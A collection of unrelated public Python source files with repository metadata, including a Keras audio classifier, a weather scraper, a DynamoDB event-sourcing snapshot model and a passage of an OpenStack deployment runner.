        serializer = PostSerializer(Post.objects.all(), many=True)
        return JsonResponse(serializer.data, safe=False)
def post_detail(request, pk):
    """Retrieve (GET) or update (PUT) a single post by primary key.

    Returns 404 if the post does not exist, 400 on invalid update data,
    and 405 for unsupported HTTP methods.
    """
    try:
        post = Post.objects.get(pk=pk)
    except Post.DoesNotExist:
        return HttpResponse(status=404)
    if request.method =='GET':
        serializer = PostSerializer(post)
        return JsonResponse(serializer.data)
    elif request.method == 'PUT':
        data = JSONParser().parse(request)
        serializer = PostSerializer(post, data=data)
        if serializer.is_valid():
            serializer.save()
            return JsonResponse(serializer.data)
        return JsonResponse(serializer.errors, status=400)
    # BUG FIX: the view previously fell through and returned None for any
    # other method, which makes Django raise; answer 405 instead.
    # NOTE(review): unlike post_list/email_list this view is not
    # @csrf_exempt — confirm whether CSRF protection on PUT is intended.
    return HttpResponse(status=405)
@csrf_exempt
def email_list(request):
    """Return every stored Email row as a JSON array (GET only).
    Requires ``EmailSerializer`` from the local ``serializers`` module.
    Non-GET requests fall through and produce no response object.
    """
    if request.method == 'GET':
        emails = Email.objects.all()
        serializer = EmailSerializer(emails, many=True)
return JsonResponse(serializer.data, safe=False) | [
"chris.melville@phntms.com"
] | chris.melville@phntms.com |
c490400d7d1cada3e4c8dd3545bcb671952c19dd | e5db9aa8890dd9a584ee2ec6ca79c10f3b33f7c7 | /audio_classification.py | 96b5449459e5ff88d21ed737dd5a32b6ed194d4b | [] | no_license | Baasant/Audio_classification | d77887702c6ab6ac4f081ac68c05217b3441dedb | 993370f8f007937a48b7d463470308897d37d6db | refs/heads/main | 2023-08-03T06:21:33.073441 | 2021-09-18T23:45:53 | 2021-09-18T23:45:53 | 407,990,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,004 | py | #https://github.com/krishnaik06/Audio-Classification/blob/main/Part%202-%20Audio%20Classification%20Data%20Preprocessing%20And%20Model%20Creation.ipynb
#### Extracting MFCC's For every audio file
import pandas as pd
import os
import librosa
from tqdm import tqdm
import numpy as np
from sklearn.preprocessing import LabelEncoder
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense,Dropout,Activation,Flatten
from tensorflow.keras.optimizers import Adam
from sklearn import metrics
# Root folder containing the per-fold audio files (fold1..fold10).
audio_dataset_path='UrbanSound8K/audio/'
metadata=pd.read_csv('UrbanSound8K/metadata/UrbanSound8K.csv')
#print(metadata.head())
## extract_feature ##
#make all audios have the same length
# Target number of MFCC time frames; shorter clips are zero-padded up to
# this width so every sample shares one (40, 174) shape.
max_pad_len = 174
def features_extractor(file):
    """Load an audio file and return a fixed-size (40, max_pad_len) MFCC matrix.

    The time axis is right-padded with zeros so every clip yields the same
    shape for the CNN input.
    """
    # BUG FIX: the original called librosa.load(file_name, ...) — reading a
    # *global* and ignoring the `file` argument — so print_prediction()
    # always re-extracted whichever file the training loop touched last.
    audio, sample_rate = librosa.load(file, res_type='kaiser_fast')
    mfccs_features = librosa.feature.mfcc(y=audio, sr=sample_rate, n_mfcc=40)
    # NOTE(review): assumes no clip exceeds max_pad_len frames — a longer
    # clip makes pad_width negative and np.pad raises; confirm with data.
    pad_width= max_pad_len - mfccs_features.shape[1]
    mfccs_scaled_features = np.pad(mfccs_features, pad_width=((0, 0), (0, pad_width)), mode='constant')
    return mfccs_scaled_features
####
### Now we iterate through every audio file and extract features
### using Mel-Frequency Cepstral Coefficients
extracted_features=[]
for index_num,row in tqdm(metadata.iterrows()):
    # Build the absolute path: <root>/fold<N>/<slice_file_name>
    file_name = os.path.join(os.path.abspath(audio_dataset_path),'fold'+str(row["fold"])+'/',str(row["slice_file_name"]))
    final_class_labels=row["class"]
    data=features_extractor(file_name)
    extracted_features.append([data,final_class_labels])
### converting extracted_features to Pandas dataframe
extracted_features_df=pd.DataFrame(extracted_features,columns=['feature','class'])
print(extracted_features_df.head())
####
### Split the dataset into independent and dependent dataset
X=np.array(extracted_features_df['feature'].tolist())
print(X.shape)
y=np.array(extracted_features_df['class'].tolist())
print(y.shape)
# One-hot encode the string class labels: LabelEncoder -> integer ids,
# to_categorical -> one-hot rows.  These imports duplicate the ones at the
# top of the file (notebook-style script); harmless, kept as-is.
from tensorflow.keras.utils import to_categorical
from sklearn.preprocessing import LabelEncoder
labelencoder=LabelEncoder()
y=to_categorical(labelencoder.fit_transform(y))
print(y)
# 80/20 train/test split with a fixed seed for reproducibility.
from sklearn.model_selection import train_test_split
X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2,random_state=0)
print(X_train.shape)
print(y_train.shape)
###train model ######
import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Convolution2D, Conv2D, MaxPooling2D, GlobalAveragePooling2D
#from keras.optimizers import Adam
#from keras.optimizers import adam
from keras.utils import np_utils
from sklearn import metrics
# Input geometry: one (40 x 174) MFCC "image" with a single channel.
num_rows = 40
num_columns = 174
num_channels = 1
X_train = X_train.reshape(X_train.shape[0], num_rows, num_columns, num_channels)
X_test = X_test.reshape(X_test.shape[0], num_rows, num_columns, num_channels)
# One output unit per one-hot class column.
num_labels = y.shape[1]
filter_size = 2
# Construct model
# Four Conv -> MaxPool -> Dropout stages with doubling filter counts,
# then global average pooling feeding a softmax classifier.
model = Sequential()
model.add(Conv2D(filters=16, kernel_size=2, input_shape=(num_rows, num_columns, num_channels), activation='relu'))
model.add(MaxPooling2D(pool_size=2))
model.add(Dropout(0.2))
model.add(Conv2D(filters=32, kernel_size=2, activation='relu'))
model.add(MaxPooling2D(pool_size=2))
model.add(Dropout(0.2))
model.add(Conv2D(filters=64, kernel_size=2, activation='relu'))
model.add(MaxPooling2D(pool_size=2))
model.add(Dropout(0.2))
model.add(Conv2D(filters=128, kernel_size=2, activation='relu'))
model.add(MaxPooling2D(pool_size=2))
model.add(Dropout(0.2))
model.add(GlobalAveragePooling2D())
model.add(Dense(num_labels, activation='softmax'))
# Compile the model
model.compile(loss='categorical_crossentropy', metrics=['accuracy'], optimizer='adam')
num_epochs = 72
num_batch_size = 256
model.fit(X_train, y_train, batch_size=num_batch_size, epochs=num_epochs, validation_data=(X_test, y_test),verbose=1)
###accuracy ###
# Evaluating the model on the training and testing set
score = model.evaluate(X_train, y_train, verbose=0)
print("Training Accuracy: ", score[1])
score = model.evaluate(X_test, y_test, verbose=0)
print("Testing Accuracy: ", score[1])
###prediction
def print_prediction(file_name):
    """Extract features for one audio file, predict its class with the
    trained global `model` and print the label plus per-class probabilities.
    Relies on the module-level model, labelencoder, num_rows/columns/channels.
    """
    prediction_feature = features_extractor(file_name)
    # Add the batch dimension expected by the CNN: (1, 40, 174, 1).
    prediction_feature = prediction_feature.reshape(1, num_rows, num_columns, num_channels)
    # NOTE(review): Sequential.predict_classes/predict_proba were removed
    # in newer TensorFlow releases; if the pinned TF version is upgraded,
    # replace with np.argmax(model.predict(x), axis=1) / model.predict(x).
    predicted_vector = model.predict_classes(prediction_feature)
    predicted_class = labelencoder.inverse_transform(predicted_vector)
    print("The predicted class is:", predicted_class[0], '\n')
    predicted_proba_vector = model.predict_proba(prediction_feature)
    predicted_proba = predicted_proba_vector[0]
    for i in range(len(predicted_proba)):
        # Map each probability index back to its class name.
        category = labelencoder.inverse_transform(np.array([i]))
        print(category[0], "\t\t : ", format(predicted_proba[i], '.32f') )
#predict class
#filename = '../UrbanSound Dataset sample/audio/100852-0-0-0.wav'
#filename ='UrbanSound8K\audio\fold1\7061-6-0-0.wav'
#print_prediction(filename)
# NOTE(review): everything below is dead code — an earlier dense (MLP)
# variant of the model kept inside an unassigned string literal.  Retained
# verbatim for reference; consider deleting it in a follow-up.
'''''
###train the model
num_labels=y.shape[1]
model=Sequential()
###first layer
model.add(Dense(100,input_shape=(40,)))
model.add(Activation('relu'))
model.add(Dropout(0.5))
###second layer
model.add(Dense(200))
model.add(Activation('relu'))
model.add(Dropout(0.5))
###third layer
model.add(Dense(100))
model.add(Activation('relu'))
model.add(Dropout(0.5))
###final layer
model.add(Dense(num_labels))
model.add(Activation('softmax'))
####
num_epochs = 100
num_batch_size = 32
##compile
model.compile(loss='categorical_crossentropy',metrics=['accuracy'],optimizer='adam')
###
model.fit(X_train, y_train, batch_size=num_batch_size, epochs=num_epochs, validation_data=(X_test, y_test), verbose=1)
test_accuracy=model.evaluate(X_test,y_test,verbose=0)
print(test_accuracy[1])
''' | [
"noreply@github.com"
] | noreply@github.com |
bfcb68987f87927b98914b07904fc10f0cd5aeea | 1927bf03784f5b55d1dbfbc375bda95501e3cc4e | /VENV/bin/pip3 | 2a33998175d9adbfb47f3206649cd7265bf6039f | [] | no_license | szmuschi/Python | 5618bf349664f1beed1e53c816cdc3f312d0c790 | f57e7d474d7b6ac9b1520378e084e6e17b7370f1 | refs/heads/main | 2023-01-07T17:45:22.405567 | 2020-10-27T08:02:37 | 2020-10-27T08:02:37 | 301,638,935 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 402 | #!/home/s/PycharmProjects/Python/Lab1/VENV/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
| [
"szmuschi@gmail.com"
] | szmuschi@gmail.com | |
eb7ae1ac126c5b743c4c5ef5c4ccf26c00e3fe0b | 6468584be4f1400ca18dabe59a5c0f05e1f45b03 | /dsl/features/create_ngram_matrix.py | 6e9dd4263e7604fd6bf0246dd03e788605d20f6d | [
"MIT"
] | permissive | juditacs/dsl | 824e04e77d7bf44aab7e0b820b3f36fea9f09e87 | d6212cb2ff0755ceed8f37ee2f80ab47c9dc780c | refs/heads/master | 2021-01-14T13:21:52.215072 | 2020-04-16T09:32:02 | 2020-04-16T09:32:02 | 35,669,552 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,825 | py | from sys import argv, stderr
import cPickle
from featurize import Tokenizer, Featurizer
from dsl.representation.model import Representation
def main():
N = int(argv[1]) if len(argv) > 1 else 3
t = Tokenizer(filter_punct=True, ws_norm=True, strip=True, replace_digits=True)
f = Featurizer(t, N=N)
f.featurize_in_directory(argv[2])
stderr.write('Featurized\n')
#m = f.to_dok_matrix(docs)
f.get_correlations()
stderr.write('Means computed\n')
f.label_feat_pearson()
stderr.write('Correlations computed\n')
cut = int(argv[4]) if len(argv) > 4 else 40
f.filter_top_ngrams(cut)
stderr.write('Top ngrams filtered\n')
f.save_features('train_features')
mtx = f.to_dok_matrix()
with open('train_mtx.cPickle', 'wb') as fh:
cPickle.dump((f.labels.l, mtx), fh, -1)
stderr.write('Data read\n')
stderr.write('Trained\n')
test_f = Featurizer(t, N=N)
test_f.featdict = f.featdict
test_f.featdict.freeze_dict()
test_f.featurize_in_directory(argv[3])
docs = test_f.filter_ngrams(test_f.docs, f.topngrams)
test_f.docs = docs
test_f.topngrams = f.topngrams
test_f.save_features('test_features')
test_f.featdict.save('topfeatures')
test_mtx = test_f.to_dok_matrix()
with open('test_mtx.cPickle', 'wb') as fh:
cPickle.dump((test_f.labels.l, test_mtx), fh, -1)
acc = 0
stderr.write('Test matrix done\n')
r = Representation('dummy', 'svm', svm_ktype='svc')
r.encode(mtx)
stderr.write('Encoded\n')
r.train_classifier(f.labels.l)
for i in xrange(test_mtx.shape[0]):
gold = test_f.labels.l[i]
cl = r.classify_vector(test_mtx.getrow(i).todense())[0]
if gold == cl:
acc += 1
print float(acc) / test_mtx.shape[0]
if __name__ == '__main__':
main()
| [
"judit@sch.bme.hu"
] | judit@sch.bme.hu |
c5f52f673df8b19e29beeee459fa1815dba1f7e4 | 8f139f0f1fd22ab42c2db7d3eb3641e97b73cdb5 | /Geometric Distribution I.py | fe69f89f33e5d9d930d795eb1318cf8b964330a3 | [
"BSD-3-Clause"
] | permissive | Victory-Organization/HackerRank-10-Days-of-Statistics | 28db22842bc778675fd74d00830a5a27c1090522 | 02e4ba930a4adb77b0fa05556ff7a950c85f3eb4 | refs/heads/main | 2023-06-18T06:44:42.394028 | 2021-07-12T18:44:17 | 2021-07-12T18:44:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | def geometric_distributon(n, p):
return ((1-p)**(n-1))*p
a, b = list(map(int, input().split()))
n = int(input())
print('{:.3f}'.format(geometric_distributon(n, a/b))) | [
"58915216+aash-gates@users.noreply.github.com"
] | 58915216+aash-gates@users.noreply.github.com |
03ada0e848cb1c19af6d2c1c844f066696db1280 | 92fac6958ab020d06663598c276d6a1371028c56 | /simpleweather/__init__.py | f75e559cd13f51a04e82b4695ad3c3f2b8d9db03 | [
"MIT"
] | permissive | CreatorSky/simpleweather | 354f28355c5f604d4664946b9e4ce52645e4708a | a79275c4e9a965013fc48b25c3fb9c36fc581f3f | refs/heads/master | 2020-07-04T12:29:36.394683 | 2020-06-11T19:49:05 | 2020-06-11T19:49:05 | 202,287,000 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,844 | py | import requests as re
from bs4 import BeautifulSoup
class Weather(object):
def __init__(self, unit='F', cords=None):
"""
:param unit: F for Fahrenheit, C for Celsius
:param cords: Weather of the passed Geocordinates is fetched,
If none,automatic Coordinates are fetched by ip.
"""
if not cords:
data = re.get('https://ipinfo.io/')
cords = data.json()['loc']
w_url = 'https://weather.com/weather/today/l/' + cords
weather_data = re.get(w_url).text
soup = BeautifulSoup(weather_data, features="html.parser")
# City
self.city = soup.find('h1', {'class': 'today_nowcard-location'}).text
# Current Temp
temp = soup.find('div', {'class': 'today_nowcard-temp'}).find('span').text
# Phrase
self.phrase = soup.find('div', {'class': 'today_nowcard-phrase'}).text
# Feels Like
feels = soup.find('span', {'class': 'deg-feels'}).text
# High Low & UV Index
hilo = list(soup.find('div', {'class': 'today_nowcard-hilo'}).children)
self.uv_index = ' '.join(hilo[5].text.split(' ')[2::])
# Precipitation
precip = soup.find('span', {'class': 'precip-val'}).text
self.precip = precip
# Wind Humidity DewPoint Pressure Visibility
tbody = soup.find('div', {'class': 'today_nowcard-sidecar'}).find('table').find('tbody').find_all('td')
self.humidity = tbody[1].text
if unit.lower() == 'f':
self.current_temp = temp + ' F'
self.feels_like = feels + ' F'
self.hi = hilo[1].text + ' F' if hilo[1].text != '--' else hilo[1].text
self.low = hilo[4].text + ' F'
self.wind = tbody[0].text
self.pressure = tbody[3].text
self.dew_point = tbody[2].text + ' F'
self.visibility = tbody[4].text
else:
self.current_temp = self.__f_to_c(temp)
self.feels_like = self.__f_to_c(feels)
self.hi = self.__f_to_c(hilo[1].text)
self.low = self.__f_to_c(hilo[4].text)
wind_data = tbody[0].text.split(' ')
wind_data[1] = str(round(float(wind_data[1]) * 1.609, 2))
wind_data[2] = 'km/h'
self.wind = ' '.join(wind_data)
self.pressure = str(round(float(tbody[3].text.split(' ')[0]) * 33.864, 2)) + ' mb'
self.dew_point = self.__f_to_c(tbody[2].text)
self.visibility = str(round(float(tbody[4].text.split(' ')[0]) * 1.609, 2)) + ' km'
def __f_to_c(self, temp):
if str(temp[:-1]).isdigit():
return str(round((float(temp[:-1]) - 32) * 5 / 9,2)) + '° C'
else:
return temp
| [
"noreply@github.com"
] | noreply@github.com |
18ad432e70696eec292c28c163e83e546229485d | 45b599cb9828e083e958f0b132fc3e893d81ba87 | /TreeParse.py | a0773d154c0a617cc9d5133c6eda2666ed34dfad | [
"BSD-3-Clause"
] | permissive | deaconjs/AlignmentEditor | 51beecd3fdfbe96d1b020fd7eb05f63ea7496b02 | 5d0c2a97aeba40b75e053306827e3d4e860d3f84 | refs/heads/master | 2021-07-13T19:29:29.096249 | 2017-10-17T02:55:32 | 2017-10-17T02:55:32 | 104,837,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,493 | py | class Data:
#Class Data is designed to hold an object in a tree
# name: the name of the node, generally more for the leaves and root
# length: the length of the branch from its top node
def __init__( self, name, length, id = 0 ):
self.name = name
self.length = length
self.id = id
def __str__( self ):
return "["+self.name+", "+ str( self.length ) + "]"
def Name( self ):
return self.name
def Length( self ):
return self.length
def Match( self, to_match ):
return to_match == self.name
class Node:
#Class Node has
# data: holding the node's current data
# sub: a list of the node's subordinate nodes
def __init__( self ):
self.data = Data("","0")
self.sub = []
self.parent = 0
def leaf( self, data ):
self.data = data
self.sub = []
def internal( self, data, sub ):
self.sub = sub
for item in self.sub:
item.parent = self
self.data = data
def children( self ):
return len( self.sub )
def __str__( self ):
total = ""
total = self.data.__str__()
if len( self.sub ) > 0:
total = total + "->("
for item in self.sub:
total = total + item.__str__() + ","
total = total[:len(total)-1] + ")"
return total
#Search current node and subordinate nodes for the node with data.name equal to name
def Search_For_Name( self, name ):
for item in self.sub:
if item.data.name == name:
return item
else:
to_return = item.Search_For_Name( name )
if( to_return != 0 ):
return to_return
return 0
#Find the longest branch distance below this node
def Longest_Branch( self ):
current_x = self.data.Length()
middle_x = 0
for each_item in self.sub:
newest_x = each_item.Longest_Branch()
if middle_x < newest_x:
middle_x = newest_x
returning = current_x + middle_x
return returning
#Return a list of the gi's found subordinate to this node
def GI_List( self ):
gi_list = []
if(len(self.sub)>0):
for item in self.sub:
if item.data.name != '':
gi_list.append(item.data.name)
else:
gi_list = gi_list + item.GI_List()
else:
gi_list.append( self.data.name )
return gi_list
#Wrapper class to hold a node
class Tree:
def __init__(self, node):
self.node = node
#Find the longest branch in the tree. If root_node is not 0, it is the star point
def Longest_Branch(self, root_node=0):
if( root_node == 0 ):
root_node = self.node
current_x = root_node.data.Length()
middle_x = 0
for each_item in root_node.sub:
newest_x = self.Longest_Branch(each_item)
if middle_x < newest_x:
middle_x = newest_x
returning = current_x + middle_x
return returning
#Search for a node given a name
def Get_Node_By_Name( self, name ):
if self.node.data.name == name:
return root
else:
return self.node.Search_For_Name( name )
| [
"deacon.sweeney@gmail.com"
] | deacon.sweeney@gmail.com |
8c1d21e127a8369519e07fe11256db5a3fde9c41 | adb8ae501aa6a6ff9ba6ab5f5affde701d0c12e2 | /snapshot/model.py | 9131e06ef6b5c0bf65ae44859e474e99ea0b1da7 | [
"Apache-2.0"
] | permissive | rafty/ServerlessEventSoutcing | 83d1a4031ac954e6f1b1d17d57f51f93f278ec10 | 4759a187373af6f0bfded4ff388ba74c09fc4368 | refs/heads/master | 2020-11-24T06:15:23.874266 | 2019-12-14T15:43:12 | 2019-12-14T15:43:12 | 228,003,694 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,148 | py | # -*- coding: utf-8 -*-
import datetime
import logging
from functools import reduce
from pynamodb.models import Model
from pynamodb.attributes import (
UnicodeAttribute,
NumberAttribute,
JSONAttribute
)
from exception_handler import (
raise_for_save_exception,
raise_for_query_exception,
raise_with_no_snapshot_exception)
from error import ItemDoesNotExist, IntegrityError
from retrying import retry
from retry_handler import is_integrity_error
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# --------------------------
# snapshot Table
# --------------------------
class SnapshotModel(Model):
class Meta:
table_name = 'EventStore'
region = 'ap-northeast-1'
max_retry_attempts = 8
base_backoff_ms = 297
item_id = UnicodeAttribute(hash_key=True)
version = NumberAttribute(range_key=True)
from_version = NumberAttribute()
name = UnicodeAttribute()
state = JSONAttribute()
saved_at = UnicodeAttribute()
order_id = UnicodeAttribute(null=True)
class State:
__initial_state = {
'available': 0,
'reserved': 0,
'bought': 0
}
def __init__(self):
pass
def apply(self, current_state, next_event):
event_type = self.__get_event_type(next_event)
handler = getattr(self, '_on_{}'.format(event_type))
if handler:
return handler(current_state, next_event)
return self.__initial_state
@staticmethod
def _on_add(state, event):
state['available'] += event['quantity']
return state
@staticmethod
def _on_reserve(state, event):
state['available'] -= event['quantity']
state['reserved'] += event['quantity']
return state
@staticmethod
def _on_complete(state, event):
state['reserved'] -= event['quantity']
state['bought'] += event['quantity']
return state
@staticmethod
def _on_cancel(state, event):
state['available'] += event['quantity']
state['reserved'] -= event['quantity']
return state
@staticmethod
def __get_event_type(event):
splited = event['event_type'].lower().split('_')
return splited[-1]
class Snapshot:
__snapshot_suffix = '-snapshot'
__initial_snapshot_form = {
'item_id': '-snapshot',
'version': 0,
'name': '',
'from_version': 0,
'state': {
'available': 0,
'reserved': 0,
'bought': 0
},
'saved_at': ''
}
def __init__(self, event):
self.__event = event
self.__model = SnapshotModel
self.__state = State()
self.__current_snapshot = {}
@retry(wait_exponential_multiplier=100,
wait_exponential_max=1000,
retry_on_exception=is_integrity_error)
def update(self):
self.__get_current_snapshot()
next_snapshot = self.__get_next_snapshot()
self.__persist(next_snapshot)
return
def __get_current_snapshot(self):
try:
snapshot_item_id = self.item_id
with raise_for_query_exception(snapshot_item_id):
snapshot = self.__model.query(
snapshot_item_id,
self.__model.version > 0,
limit=1,
scan_index_forward=False).next()
self.current_snapshot = snapshot.attribute_values
except ItemDoesNotExist:
self.current_snapshot = self.initial_snapshot
def __persist(self, next_snapshot):
snapshot = self.__model(**next_snapshot)
logger.info('__persist: {}'.format(snapshot.attribute_values))
with raise_with_no_snapshot_exception(snapshot.item_id):
snapshot.save(
condition=(self.__model.item_id != snapshot.item_id) &
(self.__model.version != snapshot.version)
)
def __get_next_snapshot(self):
logger.info('__get_next_snapshot: {}'.format(self.current_snapshot))
next_snapshot = self.current_snapshot
next_snapshot['version'] += 1
next_snapshot['from_version'] = self.__event['version']
next_snapshot['saved_at'] = str(datetime.datetime.utcnow())
next_snapshot['state'] = reduce(self.__calculate_state,
[self.__event],
self.current_snapshot['state'])
return next_snapshot
def __calculate_state(self, current_state, next_event):
return self.__state.apply(current_state, next_event)
@property
def initial_snapshot(self):
initial_snapshot = self.__initial_snapshot_form
initial_snapshot['item_id'] = self.item_id
initial_snapshot['name'] = self.__event['name']
return initial_snapshot
@property
def item_id(self):
return self.__event['item_id'] + self.__snapshot_suffix
# --------------------------
# snapshot Table
# --------------------------
class DeduplicateEventModel(Model):
class Meta:
table_name = 'EventStore'
region = 'ap-northeast-1'
max_retry_attempts = 8
base_backoff_ms = 297
item_id = UnicodeAttribute(hash_key=True)
version = NumberAttribute(range_key=True)
class DeduplicateEvent:
__item_suffix = '-deduplication'
def __init__(self, event):
self.model = DeduplicateEventModel
self.event = event
def is_duplicate_event(self):
try:
deduplicate = self.model(
self.event['event_id'] + self.__item_suffix,
0)
with raise_for_save_exception(self.event['event_id']):
deduplicate.save(
condition=(self.model.item_id != self.event_id) &
(self.model.version != 0)
)
return False
except IntegrityError:
logger.info('is_duplicate_event: {}'.format(self.event))
return True
@property
def event_id(self):
return self.event['event_id'] + self.__item_suffix
| [
"yagita.takashi@gmail.com"
] | yagita.takashi@gmail.com |
4a85b52ba9f626ebd48354c7af531849353182ac | e84446227d42d9cf93ddbdd057ac58af73e96f11 | /aasemble/deployment/runner.py | 36f07658c4fdaeabbde834e75361b00e3f05a304 | [] | no_license | pljensen/python-aasemble.deployment | 335d76133a0327695f7afe227864a31f80ab0151 | ef42ee4157f1ead79fff75a5c10ecddc761d8d01 | refs/heads/master | 2020-04-02T00:26:34.930860 | 2015-10-25T21:40:28 | 2015-10-25T21:40:28 | 48,762,074 | 0 | 0 | null | 2015-12-29T18:48:45 | 2015-12-29T18:48:44 | null | UTF-8 | Python | false | false | 28,972 | py | #!/usr/bin/env python
#
# Copyright 2015 Reliance Jio Infocomm, Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import ConfigParser
import logging
import os
import pipes
import select
import subprocess
import sys
import time
import yaml
from neutronclient.common.exceptions import Conflict as NeutronConflict
from novaclient.exceptions import Conflict as NovaConflict
from aasemble.deployment import utils, exceptions
def load_yaml(f='.aasemble.yaml'):
with open(f, 'r') as fp:
return yaml.load(fp)
def load_mappings(f='.aasemble.mappings.ini'):
with open(f, 'r') as fp:
parser = ConfigParser.SafeConfigParser()
parser.readfp(fp)
mappings = {}
for t in ('flavors', 'networks', 'images', 'routers'):
mappings[t] = {}
if parser.has_section(t):
mappings[t].update(parser.items(t))
return mappings
def find_weak_refs(stack):
images = set()
flavors = set()
networks = set()
for node_name, node in stack['nodes'].items():
images.add(node['image'])
flavors.add(node['flavor'])
networks.update([n['network'] for n in node['networks']])
dynamic_networks = set()
for network_name, network in stack.get('networks', {}).items():
dynamic_networks.add(network_name)
return images, flavors, networks-dynamic_networks
def list_refs(args, stdout=sys.stdout):
stack = load_yaml(args.stack)
images, flavors, networks = find_weak_refs(stack)
if args.tmpl:
cfg = ConfigParser.SafeConfigParser()
cfg.add_section('images')
cfg.add_section('flavors')
for image in images:
cfg.set('images', image, '<missing value>')
for flavor in flavors:
cfg.set('flavors', flavor, '<missing value>')
cfg.write(stdout)
else:
stdout.write('Images:\n ')
if images:
stdout.write(' '.join(images))
else:
stdout.write('None')
stdout.write('\n\nFlavors:\n ')
if flavors:
stdout.write(' '.join(flavors))
else:
stdout.write('None')
stdout.write('\n')
def run_cmd_once(shell_cmd, real_cmd, environment, deadline):
proc = subprocess.Popen(shell_cmd,
env=environment,
shell=True,
stdin=subprocess.PIPE)
stdin = real_cmd + '\n'
while True:
if stdin:
_, rfds, xfds = select.select([], [proc.stdin], [proc.stdin], 1)
if rfds:
proc.stdin.write(stdin[0])
stdin = stdin[1:]
if not stdin:
proc.stdin.close()
if xfds:
if proc.stdin.feof():
stdin = ''
if proc.poll() is not None:
if proc.returncode == 0:
return True
else:
raise exceptions.CommandFailedException(stdin)
if deadline and time.time() > deadline:
if proc.poll() is None:
proc.kill()
raise exceptions.CommandTimedOutException(stdin)
def get_creds_from_env():
d = {}
d['username'] = os.environ['OS_USERNAME']
d['password'] = os.environ['OS_PASSWORD']
d['auth_url'] = os.environ['OS_AUTH_URL']
d['tenant_name'] = os.environ['OS_TENANT_NAME']
return d
class Node(object):
def __init__(self, name, info, runner, keypair=None, userdata=None):
self.record_resource = lambda *args, **kwargs: None
self.name = name
self.info = info
self.runner = runner
self.keypair = keypair
self.userdata = userdata
self.server_id = None
self.fip_ids = set()
self.ports = []
self.server_status = None
self.image = None
self.flavor = None
self.attempts_left = runner.retry_count + 1
if self.info.get('image') in self.runner.mappings.get('images', {}):
self.info['image'] = self.runner.mappings['images'][self.info['image']]
if self.info.get('flavor') in self.runner.mappings.get('flavors', {}):
self.info['flavor'] = self.runner.mappings['flavors'][self.info['flavor']]
def poll(self, desired_status = 'ACTIVE'):
"""
This one poll nova and return the server status
"""
if self.server_status != desired_status:
self.server_status = self.runner.get_nova_client().servers.get(self.server_id).status
return self.server_status
def clean(self):
"""
Cleaner: This method remove server, fip, port etc.
We could keep fip and may be ports (ports are getting deleted with current
neutron client), but that is going to be bit more complex to make sure
right port is assigned to right fip etc, so atm, just removing them.
"""
for fip_id in self.fip_ids:
self.runner.delete_floatingip(fip_id)
self.fip_ids = set()
for port in self.ports:
self.runner.delete_port(port['id'])
self.ports = []
server = self.runner.delete_server(self.server_id)
self.server_id = None
def create_nics(self, networks):
nics = []
for eth_idx, network in enumerate(networks):
port_name = '%s_eth%d' % (self.name, eth_idx)
port_info = self.runner.create_port(port_name, network['network'],
[self.runner.secgroups[secgroup] for secgroup in network.get('securitygroups', [])])
self.runner.record_resource('port', port_info['id'])
self.ports.append(port_info)
if network.get('assign_floating_ip', False):
fip_id, fip_address = self.runner.create_floating_ip()
self.runner.associate_floating_ip(port_info['id'], fip_id)
port_info['floating_ip'] = fip_address
self.fip_ids.add(fip_id)
nics.append(port_info['id'])
return nics
def build(self):
if self.flavor is None:
self.flavor = self.runner.get_nova_client().flavors.get(self.info['flavor'])
nics = [{'port-id': port_id} for port_id in self.create_nics(self.info['networks'])]
volume = self.runner.create_volume(size=self.info['disk'],
image_ref=self.info['image'])
while volume.status != 'available':
time.sleep(3)
volume = self.runner.get_cinder_client().volumes.get(volume.id)
bdm = {'vda': '%s:::1' % (volume.id,)}
server = self.runner.get_nova_client().servers.create(self.name, image=None,
block_device_mapping=bdm,
flavor=self.flavor, nics=nics,
key_name=self.keypair, userdata=self.userdata)
self.runner.record_resource('server', server.id)
self.server_id = server.id
self.attempts_left -= 1
@property
def floating_ip(self):
for port in self.ports:
if 'floating_ip' in port:
return port['floating_ip']
class DeploymentRunner(object):
def __init__(self, config=None, suffix=None, mappings=None, key=None,
record_resource=None, retry_count=0):
self.cfg = config
self.suffix = suffix
self.mappings = mappings or {}
self.key = key
self.retry_count = retry_count
self.record_resource = lambda *args, **kwargs: None
self.conncache = {}
self.networks = {}
self.secgroups = {}
self.nodes = {}
def get_keystone_session(self):
from keystoneclient import session as keystone_session
from keystoneclient.auth.identity import v2 as keystone_auth_id_v2
if 'keystone_session' not in self.conncache:
self.conncache['keystone_auth'] = keystone_auth_id_v2.Password(**get_creds_from_env())
self.conncache['keystone_session'] = keystone_session.Session(auth=self.conncache['keystone_auth'])
return self.conncache['keystone_session']
def get_keystone_client(self):
from keystoneclient.v2_0 import client as keystone_client
if 'keystone' not in self.conncache:
ks = self.get_keystone_session()
self.conncache['keystone'] = keystone_client.Client(session=ks)
return self.conncache['keystone']
def get_nova_client(self):
import novaclient.client as novaclient
if 'nova' not in self.conncache:
kwargs = {'session': self.get_keystone_session()}
if 'OS_REGION_NAME' in os.environ:
kwargs['region_name'] = os.environ['OS_REGION_NAME']
self.conncache['nova'] = novaclient.Client("2", **kwargs)
